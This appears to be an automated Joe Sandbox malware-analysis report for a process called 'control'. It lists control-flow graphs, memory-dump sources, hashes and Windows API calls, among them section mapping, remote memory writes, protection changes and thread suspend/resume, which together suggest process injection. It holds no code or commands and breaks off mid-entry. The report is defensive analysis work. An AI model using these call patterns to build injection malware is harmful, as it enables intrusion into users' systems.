                                                                                                                                              control_flow_graph 618 b8387c-b838be 620 b83a8f 618->620 621 b838c4-b83907 618->621 622 b83a94-b83ab7 620->622 625 b83a7b-b83a8d 621->625 626 b8390d-b8392c 621->626 625->622 626->625 629 b83932-b83951 626->629 629->625 631 b83957-b83976 629->631 631->625 633 b8397c-b8399b 631->633 633->625 635 b839a1-b83a23 call b726aa NtCreateSection 633->635 638 b83a6a-b83a6f 635->638 639 b83a25-b83a42 call b8ffcc 635->639 643 b83a71-b83a73 638->643 644 b83a60-b83a68 639->644 645 b83a44-b83a5e call b726aa 639->645 643->625 646 b83a75-b83a79 643->646 644->643 645->643 646->622
                                                                                                                                              APIs
                                                                                                                                              • NtCreateSection.NTDLL ref: 00B83A1E
                                                                                                                                                • Part of subcall function 00B8FFCC: NtMapViewOfSection.NTDLL ref: 00B90018
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Section$CreateView
                                                                                                                                              • String ID: 0
                                                                                                                                              • API String ID: 1585966358-4108050209
                                                                                                                                              • Opcode ID: 1b09ba81fbc693a19164b594d56175538ac6b8b8ca3d4d1b7c118079c7b6344a
                                                                                                                                              • Instruction ID: a5ae9ce8fefc12f1b5a638891d9da398023f662da43f6999cd7277d253b0822f
                                                                                                                                              • Opcode Fuzzy Hash: 1b09ba81fbc693a19164b594d56175538ac6b8b8ca3d4d1b7c118079c7b6344a
                                                                                                                                              • Instruction Fuzzy Hash: D461A17061CB098FDB54EF28D889B79B7E1FB98701F10856EE88AC7261DB34D941CB81
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 650 b7bab4-b7bac8 651 b7bb0e-b7bb16 650->651 652 b7baca-b7baf5 NtAllocateVirtualMemory 650->652 653 b7baf7-b7bb07 652->653 654 b7bb09-b7bb0a 652->654 653->651 654->651
                                                                                                                                              APIs
                                                                                                                                              • NtAllocateVirtualMemory.NTDLL ref: 00B7BAF1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                                                              • String ID: @
                                                                                                                                              • API String ID: 2167126740-2766056989
                                                                                                                                              • Opcode ID: f2b98a115a46b9e14b99d056e6ec68db975ce604077d4ffc8ec3e6b59ad833c6
                                                                                                                                              • Instruction ID: 760d4b39204f7710c2974b9a7077271a2792690f4cd1f888dc0ba600be4e4f2c
                                                                                                                                              • Opcode Fuzzy Hash: f2b98a115a46b9e14b99d056e6ec68db975ce604077d4ffc8ec3e6b59ad833c6
                                                                                                                                              • Instruction Fuzzy Hash: 18F09070A19B088BDB549FE8D8CD63976E0F758305F6009ADE51AC7354EB78C944CB41
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 657 bb1002-bb1063 660 bb1069-bb1082 657->660 661 bb133d-bb1355 657->661 662 bb1088-bb1091 660->662 663 bb1237-bb1282 NtProtectVirtualMemory 660->663 668 bb1358-bb136a 661->668 662->663 667 bb1097-bb109f 662->667 665 bb1288-bb1289 663->665 666 bb131c-bb131e 663->666 670 bb128d-bb128f 665->670 666->668 669 bb1320-bb133b 666->669 671 bb10a2-bb10ae 667->671 669->668 670->668 672 bb1295-bb1299 670->672 673 bb10cc-bb10fa 671->673 674 bb10b0-bb10b1 671->674 676 bb129b-bb12af 672->676 677 bb12b1-bb12b5 672->677 683 bb1228-bb1229 673->683 684 bb1100-bb1111 673->684 678 bb10b3-bb10ca 674->678 680 bb12d0-bb1316 NtProtectVirtualMemory 676->680 681 bb12cd-bb12ce 677->681 682 bb12b7-bb12cb 677->682 678->673 678->678 680->666 680->670 681->680 682->680 687 bb122e-bb1231 683->687 685 bb111e-bb113a 684->685 686 bb1113-bb1118 684->686 689 bb120c-bb1220 685->689 690 bb1140-bb117e 685->690 686->685 688 bb1204-bb1205 686->688 687->663 687->668 688->689 689->671 691 bb1226 689->691 694 bb1180-bb1188 690->694 695 bb11a7-bb11c3 690->695 691->687 696 bb118a-bb1191 694->696 697 bb1193-bb11a4 694->697 699 bb11c8-bb11ca 695->699 700 bb11c5 695->700 696->696 696->697 697->695 701 bb11fe-bb11ff 699->701 702 bb11cc-bb11ee 699->702 700->699 701->688 702->689 703 bb11f0-bb11f9 702->703 703->690
                                                                                                                                              APIs
                                                                                                                                              • NtProtectVirtualMemory.NTDLL ref: 00BB127A
                                                                                                                                              • NtProtectVirtualMemory.NTDLL ref: 00BB1309
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846924873.0000000000BB1000.00000040.00000001.sdmp, Offset: 00BB1000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_bb1000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MemoryProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2706961497-0
                                                                                                                                              • Opcode ID: 62c72e5b7f7a7de72ca6d056198b1a577312a5f0deb375b530163255d9cf7a45
                                                                                                                                              • Instruction ID: 2c32add943141af32ad5f3265f3106b769a8b4fe93bef91891ac01481fd9e0ac
                                                                                                                                              • Opcode Fuzzy Hash: 62c72e5b7f7a7de72ca6d056198b1a577312a5f0deb375b530163255d9cf7a45
                                                                                                                                              • Instruction Fuzzy Hash: 36A1153121CB884FC724DF2CD8916F9B7E1FB95310F9849AED08BC3252E674A8468786
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • NtQueryInformationProcess.NTDLL ref: 00B9AE49
                                                                                                                                                • Part of subcall function 00B7CCA0: NtReadVirtualMemory.NTDLL ref: 00B7CCBF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InformationMemoryProcessQueryReadVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1498878907-0
                                                                                                                                              • Opcode ID: d01a758f901a9215e797dd66cccda8b0241a4ddb1edb813280150e88a935fc82
                                                                                                                                              • Instruction ID: 6e248a245b41c339514448bc0886f19b97562fce4c870f6ca40256f71a05655f
                                                                                                                                              • Opcode Fuzzy Hash: d01a758f901a9215e797dd66cccda8b0241a4ddb1edb813280150e88a935fc82
                                                                                                                                              • Instruction Fuzzy Hash: 4051877021CB044BDB59EB28D8997AAB3D5FB98340F44857EA88EC3155DE34D945CBC3
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • NtQueryInformationProcess.NTDLL ref: 00B81AEA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InformationProcessQuery
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1778838933-0
                                                                                                                                              • Opcode ID: 1b5ff2e331e8eff1cde1f90d4881bb7eda4a5dda6d44182f68fae4d6ac00e22a
                                                                                                                                              • Instruction ID: f16bde5b5c42053d4164f95065a3bb799f171379b2deb3ba624bbdba122a85d9
                                                                                                                                              • Opcode Fuzzy Hash: 1b5ff2e331e8eff1cde1f90d4881bb7eda4a5dda6d44182f68fae4d6ac00e22a
                                                                                                                                              • Instruction Fuzzy Hash: 9801A930319E4D8F9B94EF6DD4C8A3573E5FBA830575409AE9409C3130E738D886CB01
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: SectionView
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1323581903-0
                                                                                                                                              • Opcode ID: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
                                                                                                                                              • Instruction ID: 51a7994bdec7616c905c00f56e154b07cbf51a8d7a8cab8792c72f7a0653b415
                                                                                                                                              • Opcode Fuzzy Hash: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
                                                                                                                                              • Instruction Fuzzy Hash: 0401D670A08B048FCB44EF69D0C8569BBE1FB58311B10067FE949C7796DB71D885CB45
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MemoryReadVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2834387570-0
                                                                                                                                              • Opcode ID: 3f2a82dcf9ff75e792bad1dcc2e5ed508050df83e28b3dd4d81e6d546fa6ee8d
                                                                                                                                              • Instruction ID: bb2534c714de02123724abc84d6cb5cf6052c434e8b1f235d1ae0c6325c49292
                                                                                                                                              • Opcode Fuzzy Hash: 3f2a82dcf9ff75e792bad1dcc2e5ed508050df83e28b3dd4d81e6d546fa6ee8d
                                                                                                                                              • Instruction Fuzzy Hash: 69E09A70714A444BEB10AFB888C823836D0F788305F20487DE85AC3360D629C852A282
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • NtWriteVirtualMemory.NTDLL ref: 00B8384F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MemoryVirtualWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3527976591-0
                                                                                                                                              • Opcode ID: 85032ad9a9dd339a53993ae2441a8bbbfc633b83b0a06364b991555090b07627
                                                                                                                                              • Instruction ID: 3e0c11fdb8d20ecc529516222407317df51af906654c6f6f271076ebac5e65dd
                                                                                                                                              • Opcode Fuzzy Hash: 85032ad9a9dd339a53993ae2441a8bbbfc633b83b0a06364b991555090b07627
                                                                                                                                              • Instruction Fuzzy Hash: 34E01A34B15A454BEB046BB988C927972E1F788B05F2048B9F945C7270D769C9848742
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 143 b727e8-b72848 call b726aa 146 b7286c-b72874 143->146 147 b7284a-b72869 143->147 148 b72876-b72896 call b9676c 146->148 149 b7289c-b728a7 146->149 147->146 148->149 157 b72a23-b72a27 148->157 150 b728b7-b728d9 call b7cca0 149->150 151 b728a9-b728af call b9add4 149->151 162 b728df-b728e5 150->162 163 b72a1b-b72a21 150->163 158 b728b4-b728b5 151->158 160 b72a34-b72a51 157->160 161 b72a29-b72a2a 157->161 158->150 161->160 164 b72a14-b72a19 162->164 165 b728eb-b72910 VirtualProtectEx 162->165 163->157 164->157 167 b72912-b7292a call b7fb90 165->167 168 b7292c 165->168 170 b7292e-b72930 167->170 168->170 170->163 172 b72936-b7293c 170->172 173 b72941-b7297d ResumeThread SuspendThread 172->173 175 b72993-b72995 173->175 176 b7297f-b7298b 173->176 177 b72997-b7299f 175->177 178 b729a1-b729a9 175->178 176->175 177->173 177->178 180 b729b2-b729c9 call b9676c 178->180 181 b729ab-b729b0 178->181 182 b729cb-b729f8 VirtualProtectEx 180->182 181->182 182->157 185 b729fa-b72a12 call b7fb90 182->185 185->157
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectThreadVirtual$ResumeSuspend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3483329683-0
                                                                                                                                              • Opcode ID: 912752427acc2773dc81b88a95aedc23f4bd7857b4c9cbc1eabf0f137d43b05d
                                                                                                                                              • Instruction ID: 46186d40f2cfc25fc736a5389a30728c5eec1a11a687e21570129fc9fc768255
                                                                                                                                              • Opcode Fuzzy Hash: 912752427acc2773dc81b88a95aedc23f4bd7857b4c9cbc1eabf0f137d43b05d
                                                                                                                                              • Instruction Fuzzy Hash: 5561B13061CB088FDB69EB28E8957AA73E5FB98305F00456DE59EC3291DE34D9418B86
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 229 b8e8c8-b8e8f2 call b84dc4 232 b8e8f8-b8e90f call b92e50 229->232 233 b8ea0a-b8ea21 229->233 236 b8e915-b8e932 232->236 237 b8e9f6-b8ea02 232->237 238 b8e950-b8e961 236->238 239 b8e934-b8e94e 236->239 237->233 240 b8e962-b8e96d 238->240 239->238 239->240 240->237 241 b8e973-b8e9a6 CreateFileA 240->241 241->237 242 b8e9a8-b8e9bb SetFilePointer 241->242 243 b8e9ed-b8e9f0 FindCloseChangeNotification 242->243 244 b8e9bd-b8e9dd ReadFile 242->244 243->237 244->243 245 b8e9df-b8e9e4 244->245 245->243 246 b8e9e6-b8e9eb 245->246 246->243
                                                                                                                                              APIs
                                                                                                                                              • CreateFileA.KERNELBASE ref: 00B8E999
                                                                                                                                              • SetFilePointer.KERNELBASE ref: 00B8E9B3
                                                                                                                                              • ReadFile.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B96B1C), ref: 00B8E9D5
                                                                                                                                              • FindCloseChangeNotification.KERNELBASE ref: 00B8E9F0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$ChangeCloseCreateFindNotificationPointerRead
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2405668454-0
                                                                                                                                              • Opcode ID: d48e66415ee8c958f108398a66507d7349109b7993f4cd815dda9dd15392f6da
                                                                                                                                              • Instruction ID: 071235591b880daf650858d0bc4f3ca59a11d20442e009e84bd57248fd163ca0
                                                                                                                                              • Opcode Fuzzy Hash: d48e66415ee8c958f108398a66507d7349109b7993f4cd815dda9dd15392f6da
                                                                                                                                              • Instruction Fuzzy Hash: 16411030218A084FDB58EF68D8C5A6577E1F788315B2446ADE19BC7276DF74D843C781
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 247 b90f8c-b90fc4 call b9a864 250 b90fca-b90fff RegQueryValueExA 247->250 251 b91064-b9106b 247->251 252 b91008-b91011 call b926b4 250->252 253 b91001-b91006 250->253 254 b9106d-b91075 251->254 255 b910a3-b910ab 251->255 258 b91016-b91022 252->258 253->252 253->258 260 b91099 254->260 261 b91077-b91097 call b91e58 254->261 256 b910ad-b910ba call b80c48 255->256 257 b910c0-b910ca 255->257 256->257 263 b91059-b9105a 258->263 264 b91024-b91057 258->264 260->255 261->255 261->260 263->251 264->263
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00B9A864: RegCreateKeyA.ADVAPI32 ref: 00B9A887
                                                                                                                                              • RegQueryValueExA.KERNELBASE ref: 00B90FF5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateQueryValue
                                                                                                                                              • String ID: ($(
                                                                                                                                              • API String ID: 2711935003-222463766
                                                                                                                                              • Opcode ID: e12b90d25e48638c248cf623991a1d23c50be5cb427306bedcf9ef54acb60cae
                                                                                                                                              • Instruction ID: 224b61f9b1d1a007aecd044508769a86ad8fff55b7a8922e3c56bb58bd03e22d
                                                                                                                                              • Opcode Fuzzy Hash: e12b90d25e48638c248cf623991a1d23c50be5cb427306bedcf9ef54acb60cae
                                                                                                                                              • Instruction Fuzzy Hash: A631E9346187498FF705EF58EC997A5B3E1F798304F008A6ED44AC3261DB7D9588DB02
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 566 ba1310-ba138d 567 ba138f-ba13af 566->567 568 ba13b4-ba13e0 566->568 575 ba15e6-ba15fd 567->575 569 ba13e2-ba13f4 568->569 570 ba13f6-ba13fa 568->570 571 ba13fe-ba140a 569->571 570->571 573 ba1428-ba142b 571->573 574 ba140c-ba141b 571->574 576 ba14ff-ba1507 573->576 577 ba1431-ba1434 573->577 585 ba15bc-ba15c6 574->585 586 ba1421-ba1422 574->586 578 ba1518-ba151b 576->578 579 ba1509-ba1516 576->579 581 ba1448-ba1459 LoadLibraryA 577->581 582 ba1436-ba1446 577->582 583 ba15b8-ba15b9 578->583 584 ba1521-ba1524 578->584 579->578 587 ba145b-ba146f 581->587 588 ba14b3-ba14bd 581->588 582->581 582->588 583->585 590 ba154f-ba1563 584->590 591 ba1526-ba1529 584->591 594 ba15c8-ba15dd 585->594 595 ba15e3-ba15e4 585->595 586->573 601 ba1483-ba14ae 587->601 602 ba1471-ba1481 587->602 592 ba14ef-ba14f0 588->592 593 ba14bf-ba14c3 588->593 590->583 607 ba1565-ba1579 590->607 591->590 597 ba152b-ba1536 591->597 598 ba14f8-ba14f9 592->598 593->598 599 ba14c5-ba14d6 593->599 594->595 595->575 597->590 603 ba1538-ba153d 597->603 598->576 599->598 611 ba14d8-ba14ed 599->611 601->575 602->588 602->601 603->590 605 ba153f-ba1544 603->605 605->590 610 ba1546-ba154d 605->610 613 ba157b-ba1586 607->613 614 ba1588-ba158b 607->614 610->583 610->590 611->598 613->614 614->583 615 ba158d-ba15b4 614->615 615->583
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                              • String ID: H
                                                                                                                                              • API String ID: 1029625771-2852464175
                                                                                                                                              • Opcode ID: ea8b0be554912eee910b5f6e76d5c63edd561062f2e3a805656d28eae44b2b83
                                                                                                                                              • Instruction ID: 9bed795f0ac56d342ed7e6e9c0b9cb3d3a716afc8f016fd4a758c5aa41d4b0d2
                                                                                                                                              • Opcode Fuzzy Hash: ea8b0be554912eee910b5f6e76d5c63edd561062f2e3a805656d28eae44b2b83
                                                                                                                                              • Instruction Fuzzy Hash: C4A1603050CB0A8FE755EF5CD8896A677E1FBA9305F004A6ED84AC7261EF34D945CB82
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 704 b9feb8-b9ff00 call b92e50 707 ba0086-ba008b 704->707 708 b9ff06-b9ff1f call b91458 704->708 709 ba008f-ba00af 707->709 713 ba007c-ba0084 708->713 714 b9ff25-b9ff56 call b7e1d8 708->714 713->709 714->709 718 b9ff5c-b9ff64 714->718 719 b9ffdc-ba000b VirtualProtect 718->719 720 b9ff66-b9ff6b 718->720 722 ba001a-ba0072 call b81ac4 719->722 723 ba000d-ba0015 call b7a80c 719->723 720->719 721 b9ff6d-b9ff7f call b77ac0 720->721 721->719 728 b9ff81-b9ff99 call b91458 721->728 722->709 735 ba0074-ba007a 722->735 723->722 728->719 734 b9ff9b-b9ffd6 VirtualProtect 728->734 734->719 735->709
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00B91458: VirtualProtect.KERNELBASE ref: 00B9148B
                                                                                                                                              • VirtualProtect.KERNELBASE ref: 00B9FFD6
                                                                                                                                              • VirtualProtect.KERNELBASE ref: 00B9FFF9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                              • Opcode ID: 8ab32006bd1df6a701864ba7e3d69da663e7aed914991a2a5fb048f6e1491c04
                                                                                                                                              • Instruction ID: 31509c53179a530ebe3f53ad4faf9eaa25b2370d78faab507ac73a01eb59ae52
                                                                                                                                              • Opcode Fuzzy Hash: 8ab32006bd1df6a701864ba7e3d69da663e7aed914991a2a5fb048f6e1491c04
                                                                                                                                              • Instruction Fuzzy Hash: 04517E70618B098FDB44EF29D889B29B7E1FB9C311F1005AEE44EC3261DB34E945CB86
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 736 b96e1c-b96e71 call b879fd 739 b96e73-b96e86 StrRChrA 736->739 740 b96eb6-b96eef call b9f7ec 736->740 741 b96e88-b96e8b 739->741 742 b96e8d-b96e8e 739->742 746 b96ef1-b96ef7 740->746 747 b96f15-b96f1d 740->747 744 b96e94-b96eb0 call b817a0 741->744 742->744 744->740 746->747 751 b96ef9-b96f01 746->751 748 b96f2b-b96f51 747->748 749 b96f1f-b96f29 747->749 759 b96f8a-b96f90 748->759 760 b96f53-b96f5a call b94ef4 748->760 749->748 752 b96f96-b96fa0 749->752 751->747 753 b96f03-b96f08 751->753 754 b96fb0-b96fc1 752->754 755 b96fa2-b96fa9 752->755 758 b96f0a-b96f13 753->758 755->754 758->747 758->758 767 b96f92-b96f94 759->767 760->759 768 b96f5c-b96f63 760->768 767->752 767->754 769 b96f7b-b96f7e call b9c164 768->769 770 b96f65-b96f75 RtlAddVectoredContinueHandler 768->770 772 b96f83-b96f88 769->772 770->769 772->759 772->767
                                                                                                                                              APIs
                                                                                                                                              • StrRChrA.KERNELBASE ref: 00B96E7A
                                                                                                                                              • RtlAddVectoredContinueHandler.NTDLL ref: 00B96F6E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ContinueHandlerVectored
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3758255415-0
                                                                                                                                              • Opcode ID: 18d8ac82230bdfc4302373f1128c0f5960e1e63dc188b60f3db038388c3e2014
                                                                                                                                              • Instruction ID: db5978cbb9f41da97b2adb3e0c3ce9bac1d0c6b156b1cf1e5db5402357afdd43
                                                                                                                                              • Opcode Fuzzy Hash: 18d8ac82230bdfc4302373f1128c0f5960e1e63dc188b60f3db038388c3e2014
                                                                                                                                              • Instruction Fuzzy Hash: 5141D730608A098FEF54EF78A8987AA77E1FB98305B45857ED45AC3271DF38C905CB41
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 773 b78a58-b78a93 call b85de8 776 b78b43-b78b59 773->776 777 b78a99-b78aba RegOpenKeyExA 773->777 778 b78adf-b78afd call b936dc 777->778 779 b78abc-b78add 777->779 784 b78b26-b78b2b RegCloseKey 778->784 785 b78aff-b78b23 call b936dc 778->785 779->778 783 b78b31-b78b3b 779->783 783->776 784->783 785->784
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseOpen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 47109696-0
                                                                                                                                              • Opcode ID: 0bc493057bba55174271d39b91fef6ffa0c4270635545858b5e3c13c28f28606
                                                                                                                                              • Instruction ID: 6a3bcc02a4d5dc3e2c66a351ef4206478bba9bdeafe85d15d016f1fe7c56bda3
                                                                                                                                              • Opcode Fuzzy Hash: 0bc493057bba55174271d39b91fef6ffa0c4270635545858b5e3c13c28f28606
                                                                                                                                              • Instruction Fuzzy Hash: A7318070618B4C8FDB54EF28E88495AB3E5FB98300B414A6EE44EC3255EF34D944CB82
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 788 b936dc-b9372d RegQueryValueExA 789 b9372f-b93733 788->789 790 b93735-b9374d 788->790 791 b93769-b93785 789->791 793 b9374f 790->793 794 b93786-b937ad RegQueryValueExA 790->794 796 b93752-b93755 793->796 795 b937af-b937b9 794->795 794->796 795->791 796->791 797 b93757-b93761 796->797 797->791
                                                                                                                                              APIs
                                                                                                                                              • RegQueryValueExA.KERNELBASE ref: 00B9371F
                                                                                                                                              • RegQueryValueExA.KERNELBASE ref: 00B937A3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: QueryValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3660427363-0
                                                                                                                                              • Opcode ID: 2d61ef76a0f9e6cd2723d50ffb87ea22aa6033d0a4024559b1a73c32d09c5853
                                                                                                                                              • Instruction ID: 8db27cbb4413be9bd08a92f4b6d684b1745ca73d5638319485e3cb3a6373792b
                                                                                                                                              • Opcode Fuzzy Hash: 2d61ef76a0f9e6cd2723d50ffb87ea22aa6033d0a4024559b1a73c32d09c5853
                                                                                                                                              • Instruction Fuzzy Hash: 8C318D7161CB088FDB48EF58D8C9A66B7E1FBA8311F11456EE849C3252DF34ED418B86
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00B9A864: RegCreateKeyA.ADVAPI32 ref: 00B9A887
                                                                                                                                              • RegQueryValueExA.KERNELBASE ref: 00B807C3
                                                                                                                                              • RegCloseKey.KERNELBASE ref: 00B80833
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseCreateQueryValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4083198587-0
                                                                                                                                              • Opcode ID: 63f8bf2ffbde9439b19e476579ef08d7f0cd75ef32b6588a115372ae452a6d9a
